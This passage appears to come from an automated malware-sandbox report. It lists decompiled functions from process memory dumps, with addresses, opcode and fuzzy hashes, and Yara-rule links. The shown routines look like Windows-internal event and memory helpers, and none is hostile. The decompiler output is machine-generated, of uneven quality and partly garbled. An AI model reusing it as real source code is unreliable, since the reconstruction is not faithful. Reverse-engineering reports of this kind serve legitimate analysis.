                                                                                            0x04da401e
                                                                                            0x04da4023
                                                                                            0x04da4028
                                                                                            0x04da4029
                                                                                            0x04da402b
                                                                                            0x04da402f
                                                                                            0x04da4043
                                                                                            0x04da4046
                                                                                            0x04da4051
                                                                                            0x04da4057
                                                                                            0x04da405f
                                                                                            0x04da4062
                                                                                            0x04da4067
                                                                                            0x04da406f
                                                                                            0x04da407c
                                                                                            0x04da407c
                                                                                            0x04da408c
                                                                                            0x04da408c
                                                                                            0x04da4097

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2205792f850d1a9127ca35c60ca196b94bdd01902a9657f9192ef9d1881d8bf
                                                                                            • Instruction ID: e9ec86d089adc28b1fde8a1f73052b03be8d0f81b9af4c8dac0f7a52ff55c8bb
                                                                                            • Opcode Fuzzy Hash: e2205792f850d1a9127ca35c60ca196b94bdd01902a9657f9192ef9d1881d8bf
                                                                                            • Instruction Fuzzy Hash: 030184712419457FE251AB79CD80E63B7ADFB45668B00062AB60883A51CB24FC11D6E4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D914FB, Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 61%
                                                                                            			E04D914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dcd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D1FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04CF7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                            0x04d914fb
                                                                                            0x04d914fb
                                                                                            0x04d9150a
                                                                                            0x04d91514
                                                                                            0x04d91519
                                                                                            0x04d9151b
                                                                                            0x04d91526
                                                                                            0x04d9152c
                                                                                            0x04d91534
                                                                                            0x04d91537
                                                                                            0x04d9153a
                                                                                            0x04d91545
                                                                                            0x04d91557
                                                                                            0x04d91547
                                                                                            0x04d91550
                                                                                            0x04d91550
                                                                                            0x04d91562
                                                                                            0x04d91563
                                                                                            0x04d91565
                                                                                            0x04d9156a
                                                                                            0x04d9157f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0463052a212944dc1b2a0718118e73d5ef594c4543c591ce9bd632555c25a680
                                                                                            • Instruction ID: 17369e47cbbec61a344535aa7de09c76d8c68e5506d9699f61f1437842fdef1e
                                                                                            • Opcode Fuzzy Hash: 0463052a212944dc1b2a0718118e73d5ef594c4543c591ce9bd632555c25a680
                                                                                            • Instruction Fuzzy Hash: 89019E71A01248AFDB00DFA8D845EAEBBB8EF44710F40406AF914EB390DA74EE00CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D9138A, Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 61%
                                                                                            			E04D9138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dcd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D1FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04CF7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                            0x04d9138a
                                                                                            0x04d9138a
                                                                                            0x04d91399
                                                                                            0x04d913a3
                                                                                            0x04d913a8
                                                                                            0x04d913aa
                                                                                            0x04d913b5
                                                                                            0x04d913bb
                                                                                            0x04d913c3
                                                                                            0x04d913c6
                                                                                            0x04d913c9
                                                                                            0x04d913d4
                                                                                            0x04d913e6
                                                                                            0x04d913d6
                                                                                            0x04d913df
                                                                                            0x04d913df
                                                                                            0x04d913f1
                                                                                            0x04d913f2
                                                                                            0x04d913f4
                                                                                            0x04d913f9
                                                                                            0x04d9140e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 41791d8453ede85f56cb8107e50456506fe5499f4d00df92673f3cc092ecc3e9
                                                                                            • Instruction ID: 67641b41465790c8b19081b2075126e9f6d47d32cf16cf7961b8ed36fe84d38a
                                                                                            • Opcode Fuzzy Hash: 41791d8453ede85f56cb8107e50456506fe5499f4d00df92673f3cc092ecc3e9
                                                                                            • Instruction Fuzzy Hash: 86014071A41219ABDB14DFA9D841AAEB7B8FF44710F404066B904EB290D674AE01C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CD58EC, Relevance: .0, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E04CD58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4dcd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4cb5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04CD5943() != 0 &&  *0x4dc5320 > 5) {
					E04D57B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04D57B5E( &_v28, _t28);
					_t11 = E04D57B9C(0x4dc5320, 0x4cbbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04D1B640(_t11, _t17, _v8 ^ _t29, 0x4cbbf15, _t27, _t28);
			}















                                                                                            0x04cd58fb
                                                                                            0x04cd58fe
                                                                                            0x04cd5906
                                                                                            0x04cd590a
                                                                                            0x04cd593c
                                                                                            0x04cd593c
                                                                                            0x04cd590c
                                                                                            0x04cd590c
                                                                                            0x04cd5911
                                                                                            0x00000000
                                                                                            0x04cd5913
                                                                                            0x04cd5913
                                                                                            0x04cd5913
                                                                                            0x04cd5911
                                                                                            0x04cd591d
                                                                                            0x04d31035
                                                                                            0x04d3103c
                                                                                            0x04d3103f
                                                                                            0x04d31056
                                                                                            0x04d31056
                                                                                            0x04cd593b

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8145098d62d57816da9aa0dcef8e58a16c9a9c557af11bd6a94661f58498a5b6
                                                                                            • Instruction ID: 9bbc9cec5d11fbe5bbc97215f2b548a98f09bfbdc83a59574e7e9cc093668e1f
                                                                                            • Opcode Fuzzy Hash: 8145098d62d57816da9aa0dcef8e58a16c9a9c557af11bd6a94661f58498a5b6
                                                                                            • Instruction Fuzzy Hash: 6B01A771B00115BBEB14DB65DC109AF77AAEF44234F980069DD05A7254EE30FD03C690
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D8FEC0, Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E04D8FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dcd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D1FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04CF7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x04d8fec0
                                                                                            0x04d8fec0
                                                                                            0x04d8fecf
                                                                                            0x04d8fed9
                                                                                            0x04d8fede
                                                                                            0x04d8fee0
                                                                                            0x04d8feeb
                                                                                            0x04d8fef3
                                                                                            0x04d8fef6
                                                                                            0x04d8fef9
                                                                                            0x04d8ff04
                                                                                            0x04d8ff16
                                                                                            0x04d8ff06
                                                                                            0x04d8ff0f
                                                                                            0x04d8ff0f
                                                                                            0x04d8ff21
                                                                                            0x04d8ff22
                                                                                            0x04d8ff24
                                                                                            0x04d8ff29
                                                                                            0x04d8ff3e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ccf05a3e5408a122683cf98e084fd2282202dbad5adb2db6e71c69b00588574d
                                                                                            • Instruction ID: 248318df15ec42566ad77be37460cae8db3de161c56db825974ae6e6b96606d8
                                                                                            • Opcode Fuzzy Hash: ccf05a3e5408a122683cf98e084fd2282202dbad5adb2db6e71c69b00588574d
                                                                                            • Instruction Fuzzy Hash: 40018871E01208ABDB14DBA9D845FAEB7B8EF44714F40406BF9009B391E974E941C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D8FE3F, Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E04D8FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dcd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D1FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04CF7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x04d8fe3f
                                                                                            0x04d8fe3f
                                                                                            0x04d8fe4e
                                                                                            0x04d8fe58
                                                                                            0x04d8fe5d
                                                                                            0x04d8fe5f
                                                                                            0x04d8fe6a
                                                                                            0x04d8fe72
                                                                                            0x04d8fe75
                                                                                            0x04d8fe78
                                                                                            0x04d8fe83
                                                                                            0x04d8fe95
                                                                                            0x04d8fe85
                                                                                            0x04d8fe8e
                                                                                            0x04d8fe8e
                                                                                            0x04d8fea0
                                                                                            0x04d8fea1
                                                                                            0x04d8fea3
                                                                                            0x04d8fea8
                                                                                            0x04d8febd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 204ce60081909ff3c0725f9eee24ee67b3b4f815d4e3f46bce2375301d5a4910
                                                                                            • Instruction ID: 90a0f4c5b894b39f99f2c03594d9b7e34be9afd66d0a0456754cf6d4ea742cb8
                                                                                            • Opcode Fuzzy Hash: 204ce60081909ff3c0725f9eee24ee67b3b4f815d4e3f46bce2375301d5a4910
                                                                                            • Instruction Fuzzy Hash: EC018471F01208ABDB14EFA9D855FBEB7B8EF44714F00406AF900AB391DA74E901C7A4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA1074, Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04DA1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04DA165E(__ebx, 0x4dc8ae4, (__edx -  *0x4dc8b04 >> 0x14) + (__edx -  *0x4dc8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4dc8b04 >> 0x14) + (__edx -  *0x4dc8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04D9AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04CF7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04D8FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                            0x04da1074
                                                                                            0x04da1080
                                                                                            0x04da1082
                                                                                            0x04da108a
                                                                                            0x04da108f
                                                                                            0x04da1093
                                                                                            0x04da10ab
                                                                                            0x04da10ab
                                                                                            0x04da10c3
                                                                                            0x04da10cf
                                                                                            0x04da10e1
                                                                                            0x04da10d1
                                                                                            0x04da10da
                                                                                            0x04da10da
                                                                                            0x04da10e9
                                                                                            0x04da10f5
                                                                                            0x04da10f5
                                                                                            0x04da10fe

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e760351e0bc5eb8bd88919748bc335f06d127de1d212c8755f2a63ccce23b8c6
                                                                                            • Instruction ID: cfb76b466fff0e941f8c4ca5c6b85ae59ca6b19b5a11cf4a11efbbb906efd0cc
                                                                                            • Opcode Fuzzy Hash: e760351e0bc5eb8bd88919748bc335f06d127de1d212c8755f2a63ccce23b8c6
                                                                                            • Instruction Fuzzy Hash: 4501F1726047829BD711EF28C800A1AB7E5FB84318F048629F88583290EE34E860DBA6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CEB02A, Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CEB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04CF7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04D57016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                            0x04ceb037
                                                                                            0x04ceb039
                                                                                            0x04ceb03b
                                                                                            0x04ceb040
                                                                                            0x04d3a60e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3a61d
                                                                                            0x04ceb04b
                                                                                            0x04ceb04e
                                                                                            0x04d3a627
                                                                                            0x04d3a634
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3a641
                                                                                            0x04d3a653
                                                                                            0x04d3a643
                                                                                            0x04d3a64c
                                                                                            0x04d3a64c
                                                                                            0x04d3a65b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d3a66c
                                                                                            0x04ceb057
                                                                                            0x04ceb057
                                                                                            0x04ceb057
                                                                                            0x04ceb046
                                                                                            0x04ceb046
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction ID: ab22df6c563020eeee0d1f996d60b6eff1d52454091c44cea4cc16470f037579
                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction Fuzzy Hash: C7018F723059849FD322CB5EC988F7677E9EB45754F0900A1F919CBA61E728FC40C620
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8ED6, Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E04DA8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4dcd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04CF7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04D1B640(E04D19AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                            0x04da8ed6
                                                                                            0x04da8ee5
                                                                                            0x04da8eed
                                                                                            0x04da8ef0
                                                                                            0x04da8efa
                                                                                            0x04da8f03
                                                                                            0x04da8f0c
                                                                                            0x04da8f15
                                                                                            0x04da8f24
                                                                                            0x04da8f27
                                                                                            0x04da8f31
                                                                                            0x04da8f43
                                                                                            0x04da8f33
                                                                                            0x04da8f3c
                                                                                            0x04da8f3c
                                                                                            0x04da8f4e
                                                                                            0x04da8f4f
                                                                                            0x04da8f51
                                                                                            0x04da8f56
                                                                                            0x04da8f69

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47b2fb9d366ee1228b8a59c64a9abe8ebec5124e848b82703ef9345216d48be5
                                                                                            • Instruction ID: 6ce216254d4c930e53394c5cc884420e3c7c01b77b26e7dfe2ec2823daf80f3d
                                                                                            • Opcode Fuzzy Hash: 47b2fb9d366ee1228b8a59c64a9abe8ebec5124e848b82703ef9345216d48be5
                                                                                            • Instruction Fuzzy Hash: 36111270E002099FDB04DFA8D451BADB7F4FF08300F0442A6E918EB341E634A940DB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA8A62, Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E04DA8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4dcd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04CF7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D1B640(E04D19AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x04da8a62
                                                                                            0x04da8a71
                                                                                            0x04da8a79
                                                                                            0x04da8a82
                                                                                            0x04da8a85
                                                                                            0x04da8a89
                                                                                            0x04da8a8c
                                                                                            0x04da8a8f
                                                                                            0x04da8a92
                                                                                            0x04da8a95
                                                                                            0x04da8a9f
                                                                                            0x04da8ab1
                                                                                            0x04da8aa1
                                                                                            0x04da8aaa
                                                                                            0x04da8aaa
                                                                                            0x04da8abc
                                                                                            0x04da8abd
                                                                                            0x04da8abf
                                                                                            0x04da8ac4
                                                                                            0x04da8ada

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: de6e3b4f327317951fe50bc3bfc2c23dac6ae5e41804a551f2b488ad8c748dd0
                                                                                            • Instruction ID: 1f54406901c7b2b90614e0b90c4653283f5b0e653d36bd84e3fa66eda536eb35
                                                                                            • Opcode Fuzzy Hash: de6e3b4f327317951fe50bc3bfc2c23dac6ae5e41804a551f2b488ad8c748dd0
                                                                                            • Instruction Fuzzy Hash: D6012CB1A0121DAFDB00EFA9D9559AEB7B8FF48310F10405AF904E7351E634AD11CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDDB60, Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CDDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04CDDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04CDE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04CDE8B0(__ecx, _t14, 0xfff);
							L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                            0x04cddb64
                                                                                            0x04cddb66
                                                                                            0x04cddb6b
                                                                                            0x04cddbaa
                                                                                            0x04cddb71
                                                                                            0x04cddb76
                                                                                            0x04cddb7a
                                                                                            0x04cddba3
                                                                                            0x04cddb7c
                                                                                            0x04cddb87
                                                                                            0x04cddb8b
                                                                                            0x04d34fa1
                                                                                            0x04d34fb3
                                                                                            0x04d34fb8
                                                                                            0x04cddb91
                                                                                            0x04cddb96
                                                                                            0x04cddb98
                                                                                            0x04cddb98
                                                                                            0x04cddb8b
                                                                                            0x04cddb7a
                                                                                            0x04cddb9d
                                                                                            0x04cddba2

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction ID: 1f2af337b30f96b07005f33ed4d8814a57be5cc844dcbfa2a0cb0e7eb9600ef7
                                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction Fuzzy Hash: 07F09233641562AFD7726A5548C0F67B6579FC1658F190075F3065B344CA64BC01A6D1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CDB1E1, Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04CDB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04CF7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
